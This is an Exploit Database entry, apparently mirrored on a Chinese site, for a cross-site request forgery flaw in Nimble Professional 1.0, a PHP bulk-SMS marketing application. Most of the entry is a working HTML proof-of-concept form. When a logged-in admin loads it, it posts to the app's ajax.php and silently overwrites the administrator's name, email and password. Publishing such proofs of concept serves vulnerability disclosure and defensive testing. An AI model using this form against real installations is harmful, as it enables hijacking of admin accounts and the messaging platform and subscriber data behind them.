Nimble Professional 1.0 – Cross-Site Request Forgery (Update Admin)

• Exploit Database
• 41 阅读

• 作者： Ihsan Sencan
  日期： 2017-09-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42648/

• <!--
  # # # # # 
  # Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
  # Dork: N/A
  # Date: 11.09.2017
  # Vendor Homepage: http://ranksol.com/
  # Software Link: http://www.mojomarketplace.com/item/nimble-pro
  # Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
  # Version: 1.0
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: N/A
  # # # # #
  # Exploit Author: Ihsan Sencan
  # Author Web: http://ihsan.net
  # Author Social: @ihsansencan
  # # # # #
  # 
  # Proof of Concept:
  -->
  <html>
  <body>
  <label>Edit Profile:</label>
  <form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
  <label>Admin Name:</label>
  <input type="text" name="name" style="width: 400px;" value="Admin">
  <label>Admin Email:</label>
  <input type="text" name="email" style="width: 400px;" value="a@a.com">
  <label>Admin Password:</label>
  <input type="text" name="pass" style="width: 400px;" value="efe">
  <button type="submit" class="btnbtn-success" >Save Profile</button>
  <input type="hidden" name="cmd" value="save_profile">
  </form>
  </body>
  </html>